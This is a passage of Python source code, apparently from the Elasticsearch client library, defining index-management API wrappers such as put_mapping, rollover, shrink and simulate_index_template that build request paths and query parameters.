pretty: Optional[bool] = None,
timeout: Optional[Any] = None,
wait_for_active_shards: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Opens an index.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-open-close.html>`_
:param index: A comma separated list of indices to open
:param allow_no_indices: Whether to ignore if a wildcard indices expression resolves
into no concrete indices. (This includes `_all` string or when no indices
have been specified)
:param expand_wildcards: Whether to expand wildcard expression to concrete indices
that are open, closed or both.
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
:param master_timeout: Specify timeout for connection to master
:param timeout: Explicit operation timeout
:param wait_for_active_shards: Sets the number of active shards to wait for before
the operation returns.
"""
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'index'")
__path = f"/{_quote(index)}/_open"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if timeout is not None:
__query["timeout"] = timeout
if wait_for_active_shards is not None:
__query["wait_for_active_shards"] = wait_for_active_shards
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("POST", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def promote_data_stream(
self,
*,
name: Any,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Promotes a data stream from a replicated data stream managed by CCR to a regular
data stream
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html>`_
:param name: The name of the data stream
"""
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'name'")
__path = f"/_data_stream/_promote/{_quote(name)}"
__query: Dict[str, Any] = {}
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("POST", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters(
body_fields=True,
)
def put_alias(
self,
*,
index: Any,
name: Any,
error_trace: Optional[bool] = None,
filter: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
index_routing: Optional[Any] = None,
is_write_index: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
routing: Optional[Any] = None,
search_routing: Optional[Any] = None,
timeout: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Creates or updates an alias.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-aliases.html>`_
:param index: A comma-separated list of index names the alias should point to
(supports wildcards); use `_all` to perform the operation on all indices.
:param name: The name of the alias to be created or updated
:param filter:
:param index_routing:
:param is_write_index:
:param master_timeout: Specify timeout for connection to master
:param routing:
:param search_routing:
:param timeout: Explicit timestamp for the document
"""
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'index'")
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'name'")
__path = f"/{_quote(index)}/_alias/{_quote(name)}"
__query: Dict[str, Any] = {}
__body: Dict[str, Any] = {}
if error_trace is not None:
__query["error_trace"] = error_trace
if filter is not None:
__body["filter"] = filter
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if index_routing is not None:
__body["index_routing"] = index_routing
if is_write_index is not None:
__body["is_write_index"] = is_write_index
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if routing is not None:
__body["routing"] = routing
if search_routing is not None:
__body["search_routing"] = search_routing
if timeout is not None:
__query["timeout"] = timeout
if not __body:
__body = None # type: ignore[assignment]
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
if __body is not None:
__headers["content-type"] = "application/json"
return self._perform_request("PUT", __target, headers=__headers, body=__body) # type: ignore[no-any-return,return-value]
@_rewrite_parameters(
body_fields=True,
parameter_aliases={"_meta": "meta"},
)
def put_index_template(
self,
*,
name: Any,
composed_of: Optional[List[Any]] = None,
create: Optional[bool] = None,
data_stream: Optional[Any] = None,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
index_patterns: Optional[Any] = None,
meta: Optional[Any] = None,
pretty: Optional[bool] = None,
priority: Optional[int] = None,
template: Optional[Any] = None,
version: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Creates or updates an index template.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates.html>`_
:param name: Index or template name
:param composed_of:
:param create: Whether the index template should only be added if new or can
also replace an existing one
:param data_stream:
:param index_patterns:
:param meta:
:param priority:
:param template:
:param version:
"""
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'name'")
__path = f"/_index_template/{_quote(name)}"
__body: Dict[str, Any] = {}
__query: Dict[str, Any] = {}
if composed_of is not None:
__body["composed_of"] = composed_of
if create is not None:
__query["create"] = create
if data_stream is not None:
__body["data_stream"] = data_stream
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if index_patterns is not None:
__body["index_patterns"] = index_patterns
if meta is not None:
__body["_meta"] = meta
if pretty is not None:
__query["pretty"] = pretty
if priority is not None:
__body["priority"] = priority
if template is not None:
__body["template"] = template
if version is not None:
__body["version"] = version
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json", "content-type": "application/json"}
return self._perform_request("PUT", __target, headers=__headers, body=__body) # type: ignore[no-any-return,return-value]
@_rewrite_parameters(
body_fields=True,
parameter_aliases={
"_field_names": "field_names",
"_meta": "meta",
"_routing": "routing",
"_source": "source",
},
)
def put_mapping(
self,
*,
index: Any,
allow_no_indices: Optional[bool] = None,
date_detection: Optional[bool] = None,
dynamic: Optional[Any] = None,
dynamic_date_formats: Optional[List[str]] = None,
dynamic_templates: Optional[Union[Dict[str, Any], List[Dict[str, Any]]]] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
field_names: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
master_timeout: Optional[Any] = None,
meta: Optional[Dict[str, Any]] = None,
numeric_detection: Optional[bool] = None,
pretty: Optional[bool] = None,
properties: Optional[Dict[Any, Any]] = None,
routing: Optional[Any] = None,
runtime: Optional[Any] = None,
source: Optional[Any] = None,
timeout: Optional[Any] = None,
write_index_only: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Updates the index mappings.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-put-mapping.html>`_
:param index: A comma-separated list of index names the mapping should be added
to (supports wildcards); use `_all` or omit to add the mapping on all indices.
:param allow_no_indices: Whether to ignore if a wildcard indices expression resolves
into no concrete indices. (This includes `_all` string or when no indices
have been specified)
:param date_detection: Controls whether dynamic date detection is enabled.
:param dynamic: Controls whether new fields are added dynamically.
:param dynamic_date_formats: If date detection is enabled then new string fields
are checked against 'dynamic_date_formats' and if the value matches then
a new date field is added instead of string.
:param dynamic_templates: Specify dynamic templates for the mapping.
:param expand_wildcards: Whether to expand wildcard expression to concrete indices
that are open, closed or both.
:param field_names: Control whether field names are enabled for the index.
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
:param master_timeout: Specify timeout for connection to master
:param meta: A mapping type can have custom meta data associated with it. These
are not used at all by Elasticsearch, but can be used to store application-specific
metadata.
:param numeric_detection: Automatically map strings into numeric data types for
all fields.
:param properties: Mapping for a field. For new fields, this mapping can include:
- Field name - Field data type - Mapping parameters
:param routing: Enable making a routing value required on indexed documents.
:param runtime: Mapping of runtime fields for the index.
:param source: Control whether the _source field is enabled on the index.
:param timeout: Explicit operation timeout
:param write_index_only: When true, applies mappings only to the write index
of an alias or data stream
"""
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'index'")
__path = f"/{_quote(index)}/_mapping"
__query: Dict[str, Any] = {}
__body: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if date_detection is not None:
__body["date_detection"] = date_detection
if dynamic is not None:
__body["dynamic"] = dynamic
if dynamic_date_formats is not None:
__body["dynamic_date_formats"] = dynamic_date_formats
if dynamic_templates is not None:
__body["dynamic_templates"] = dynamic_templates
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if field_names is not None:
__body["_field_names"] = field_names
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if meta is not None:
__body["_meta"] = meta
if numeric_detection is not None:
__body["numeric_detection"] = numeric_detection
if pretty is not None:
__query["pretty"] = pretty
if properties is not None:
__body["properties"] = properties
if routing is not None:
__body["_routing"] = routing
if runtime is not None:
__body["runtime"] = runtime
if source is not None:
__body["_source"] = source
if timeout is not None:
__query["timeout"] = timeout
if write_index_only is not None:
__query["write_index_only"] = write_index_only
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json", "content-type": "application/json"}
return self._perform_request("PUT", __target, headers=__headers, body=__body) # type: ignore[no-any-return,return-value]
@_rewrite_parameters(
body_name="settings",
)
def put_settings(
self,
*,
settings: Any,
index: Optional[Any] = None,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
flat_settings: Optional[bool] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
master_timeout: Optional[Any] = None,
preserve_existing: Optional[bool] = None,
pretty: Optional[bool] = None,
timeout: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Updates the index settings.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-update-settings.html>`_
:param settings:
:param index: A comma-separated list of index names; use `_all` or empty string
to perform the operation on all indices
:param allow_no_indices: Whether to ignore if a wildcard indices expression resolves
into no concrete indices. (This includes `_all` string or when no indices
have been specified)
:param expand_wildcards: Whether to expand wildcard expression to concrete indices
that are open, closed or both.
:param flat_settings: Return settings in flat format (default: false)
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
:param master_timeout: Specify timeout for connection to master
:param preserve_existing: Whether to update existing settings. If set to `true`
existing settings on an index remain unchanged, the default is `false`
:param timeout: Explicit operation timeout
"""
if settings is None:
raise ValueError("Empty value passed for parameter 'settings'")
if index not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_settings"
else:
__path = "/_settings"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if flat_settings is not None:
__query["flat_settings"] = flat_settings
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if preserve_existing is not None:
__query["preserve_existing"] = preserve_existing
if pretty is not None:
__query["pretty"] = pretty
if timeout is not None:
__query["timeout"] = timeout
__body = settings
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json", "content-type": "application/json"}
return self._perform_request("PUT", __target, headers=__headers, body=__body) # type: ignore[no-any-return,return-value]
@_rewrite_parameters(
body_fields=True,
)
def put_template(
self,
*,
name: Any,
aliases: Optional[Dict[Any, Any]] = None,
create: Optional[bool] = None,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
flat_settings: Optional[bool] = None,
human: Optional[bool] = None,
index_patterns: Optional[Union[List[str], str]] = None,
mappings: Optional[Any] = None,
master_timeout: Optional[Any] = None,
order: Optional[int] = None,
pretty: Optional[bool] = None,
settings: Optional[Dict[str, Any]] = None,
timeout: Optional[Any] = None,
version: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Creates or updates an index template.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates.html>`_
:param name: The name of the template
:param aliases: Aliases for the index.
:param create: If true, this request cannot replace or update existing index
templates.
:param flat_settings:
:param index_patterns: Array of wildcard expressions used to match the names
of indices during creation.
:param mappings: Mapping for fields in the index.
:param master_timeout: Period to wait for a connection to the master node. If
no response is received before the timeout expires, the request fails and
returns an error.
:param order: Order in which Elasticsearch applies this template if index matches
multiple templates. Templates with lower 'order' values are merged first.
Templates with higher 'order' values are merged later, overriding templates
with lower values.
:param settings: Configuration options for the index.
:param timeout:
:param version: Version number used to manage index templates externally. This
number is not automatically generated by Elasticsearch.
"""
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'name'")
__path = f"/_template/{_quote(name)}"
__body: Dict[str, Any] = {}
__query: Dict[str, Any] = {}
if aliases is not None:
__body["aliases"] = aliases
if create is not None:
__query["create"] = create
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if flat_settings is not None:
__query["flat_settings"] = flat_settings
if human is not None:
__query["human"] = human
if index_patterns is not None:
__body["index_patterns"] = index_patterns
if mappings is not None:
__body["mappings"] = mappings
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if order is not None:
__body["order"] = order
if pretty is not None:
__query["pretty"] = pretty
if settings is not None:
__body["settings"] = settings
if timeout is not None:
__query["timeout"] = timeout
if version is not None:
__body["version"] = version
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json", "content-type": "application/json"}
return self._perform_request("PUT", __target, headers=__headers, body=__body) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def recovery(
self,
*,
index: Optional[Any] = None,
active_only: Optional[bool] = None,
detailed: Optional[bool] = None,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Returns information about ongoing index shard recoveries.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-recovery.html>`_
:param index: A comma-separated list of index names; use `_all` or empty string
to perform the operation on all indices
:param active_only: Display only those recoveries that are currently on-going
:param detailed: Whether to display detailed information about shard recovery
"""
if index not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_recovery"
else:
__path = "/_recovery"
__query: Dict[str, Any] = {}
if active_only is not None:
__query["active_only"] = active_only
if detailed is not None:
__query["detailed"] = detailed
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("GET", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def refresh(
self,
*,
index: Optional[Any] = None,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Performs the refresh operation in one or more indices.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-refresh.html>`_
:param index: A comma-separated list of index names; use `_all` or empty string
to perform the operation on all indices
:param allow_no_indices: Whether to ignore if a wildcard indices expression resolves
into no concrete indices. (This includes `_all` string or when no indices
have been specified)
:param expand_wildcards: Whether to expand wildcard expression to concrete indices
that are open, closed or both.
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
"""
if index not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_refresh"
else:
__path = "/_refresh"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("POST", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def reload_search_analyzers(
self,
*,
index: Any,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Reloads an index's search analyzers and their resources.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-reload-analyzers.html>`_
:param index: A comma-separated list of index names to reload analyzers for
:param allow_no_indices: Whether to ignore if a wildcard indices expression resolves
into no concrete indices. (This includes `_all` string or when no indices
have been specified)
:param expand_wildcards: Whether to expand wildcard expression to concrete indices
that are open, closed or both.
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
"""
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'index'")
__path = f"/{_quote(index)}/_reload_search_analyzers"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("POST", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def resolve_index(
self,
*,
name: Any,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Returns information about any matching indices, aliases, and data streams
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-resolve-index-api.html>`_
:param name: A comma-separated list of names or wildcard expressions
:param expand_wildcards: Whether wildcard expressions should get expanded to
open or closed indices (default: open)
"""
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'name'")
__path = f"/_resolve/index/{_quote(name)}"
__query: Dict[str, Any] = {}
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("GET", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters(
body_fields=True,
)
def rollover(
self,
*,
alias: Any,
new_index: Optional[Any] = None,
aliases: Optional[Dict[Any, Any]] = None,
conditions: Optional[Any] = None,
dry_run: Optional[bool] = None,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
mappings: Optional[Any] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
settings: Optional[Dict[str, Any]] = None,
timeout: Optional[Any] = None,
wait_for_active_shards: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Updates an alias to point to a new index when the existing index is considered
to be too large or too old.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-rollover-index.html>`_
:param alias: The name of the alias to rollover
:param new_index: The name of the rollover index
:param aliases:
:param conditions:
:param dry_run: If set to true the rollover action will only be validated but
not actually performed even if a condition matches. The default is false
:param mappings:
:param master_timeout: Specify timeout for connection to master
:param settings:
:param timeout: Explicit operation timeout
:param wait_for_active_shards: Set the number of active shards to wait for on
the newly created rollover index before the operation returns.
"""
if alias in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'alias'")
if alias not in SKIP_IN_PATH and new_index not in SKIP_IN_PATH:
__path = f"/{_quote(alias)}/_rollover/{_quote(new_index)}"
elif alias not in SKIP_IN_PATH:
__path = f"/{_quote(alias)}/_rollover"
else:
raise ValueError("Couldn't find a path for the given parameters")
__body: Dict[str, Any] = {}
__query: Dict[str, Any] = {}
if aliases is not None:
__body["aliases"] = aliases
if conditions is not None:
__body["conditions"] = conditions
if dry_run is not None:
__query["dry_run"] = dry_run
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if mappings is not None:
__body["mappings"] = mappings
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if settings is not None:
__body["settings"] = settings
if timeout is not None:
__query["timeout"] = timeout
if wait_for_active_shards is not None:
__query["wait_for_active_shards"] = wait_for_active_shards
if not __body:
__body = None # type: ignore[assignment]
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
if __body is not None:
__headers["content-type"] = "application/json"
return self._perform_request("POST", __target, headers=__headers, body=__body) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def segments(
self,
*,
index: Optional[Any] = None,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
pretty: Optional[bool] = None,
verbose: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Provides low-level information about segments in a Lucene index.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-segments.html>`_
:param index: A comma-separated list of index names; use `_all` or empty string
to perform the operation on all indices
:param allow_no_indices: Whether to ignore if a wildcard indices expression resolves
into no concrete indices. (This includes `_all` string or when no indices
have been specified)
:param expand_wildcards: Whether to expand wildcard expression to concrete indices
that are open, closed or both.
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
:param verbose: Includes detailed memory usage by Lucene.
"""
if index not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_segments"
else:
__path = "/_segments"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if pretty is not None:
__query["pretty"] = pretty
if verbose is not None:
__query["verbose"] = verbose
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("GET", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def shard_stores(
self,
*,
index: Optional[Any] = None,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
pretty: Optional[bool] = None,
status: Optional[Union[Any, List[Any]]] = None,
) -> ObjectApiResponse[Any]:
"""
Provides store information for shard copies of indices.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-shards-stores.html>`_
:param index: List of data streams, indices, and aliases used to limit the request.
:param allow_no_indices: If false, the request returns an error if any wildcard
expression, index alias, or _all value targets only missing or closed indices.
This behavior applies even if the request targets other open indices.
:param expand_wildcards: Type of index that wildcard patterns can match. If the
request can target data streams, this argument determines whether wildcard
expressions match hidden data streams.
:param ignore_unavailable: If true, missing or closed indices are not included
in the response.
:param status: List of shard health statuses used to limit the request.
"""
if index not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_shard_stores"
else:
__path = "/_shard_stores"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if pretty is not None:
__query["pretty"] = pretty
if status is not None:
__query["status"] = status
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("GET", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters(
body_fields=True,
)
def shrink(
self,
*,
index: Any,
target: Any,
aliases: Optional[Dict[Any, Any]] = None,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
settings: Optional[Dict[str, Any]] = None,
timeout: Optional[Any] = None,
wait_for_active_shards: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Allow to shrink an existing index into a new index with fewer primary shards.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-shrink-index.html>`_
:param index: The name of the source index to shrink
:param target: The name of the target index to shrink into
:param aliases:
:param master_timeout: Specify timeout for connection to master
:param settings:
:param timeout: Explicit operation timeout
:param wait_for_active_shards: Set the number of active shards to wait for on
the shrunken index before the operation returns.
"""
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'index'")
if target in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'target'")
__path = f"/{_quote(index)}/_shrink/{_quote(target)}"
__body: Dict[str, Any] = {}
__query: Dict[str, Any] = {}
if aliases is not None:
__body["aliases"] = aliases
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if settings is not None:
__body["settings"] = settings
if timeout is not None:
__query["timeout"] = timeout
if wait_for_active_shards is not None:
__query["wait_for_active_shards"] = wait_for_active_shards
if not __body:
__body = None # type: ignore[assignment]
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
if __body is not None:
__headers["content-type"] = "application/json"
return self._perform_request("PUT", __target, headers=__headers, body=__body) # type: ignore[no-any-return,return-value]
@_rewrite_parameters(
body_fields=True,
parameter_aliases={"_meta": "meta"},
)
def simulate_index_template(
self,
*,
name: Any,
allow_auto_create: Optional[bool] = None,
composed_of: Optional[List[Any]] = None,
create: Optional[bool] = None,
data_stream: Optional[Any] = None,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
index_patterns: Optional[Any] = None,
master_timeout: Optional[Any] = None,
meta: Optional[Any] = None,
pretty: Optional[bool] = None,
priority: Optional[int] = None,
template: Optional[Any] = None,
version: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Simulate matching the given index name against the index templates in the system
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates.html>`_
:param name: Index or template name to simulate
:param allow_auto_create:
:param composed_of:
:param create: If `true`, the template passed in the body is only used if no
existing templates match the same index patterns. If `false`, the simulation
uses the template with the highest priority. Note that the template is not
permanently added or updated in either case; it is only used for the simulation.
:param data_stream:
:param index_patterns:
:param master_timeout: Period to wait for a connection to the master node. If
no response is received before the timeout expires, the request fails and
returns an error.
:param meta:
:param priority:
:param template:
:param version:
"""
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'name'")
__path = f"/_index_template/_simulate_index/{_quote(name)}"
__body: Dict[str, Any] = {}
__query: Dict[str, Any] = {}
if allow_auto_create is not None:
__body["allow_auto_create"] = allow_auto_create
if composed_of is not None:
__body["composed_of"] = composed_of
if create is not None:
__query["create"] = create
if data_stream is not None:
__body["data_stream"] = data_stream
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if index_patterns is not None:
__body["index_patterns"] = index_patterns
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if meta is not None:
__body["_meta"] = meta
if pretty is not None:
__query["pretty"] = pretty
if priority is not None:
__body["priority"] = priority
if template is not None:
__body["template"] = template
if version is not None:
__body["version"] = version
if not __body:
__body = None # type: ignore[assignment]
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
if __body is not None:
__headers["content-type"] = "application/json"
return self._perform_request("POST", __target, headers=__headers, body=__body) # type: ignore[no-any-return,return-value]
@_rewrite_parameters(
body_name="template",
)
def simulate_template(
self,
*,
name: Optional[Any] = None,
create: Optional[bool] = None,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
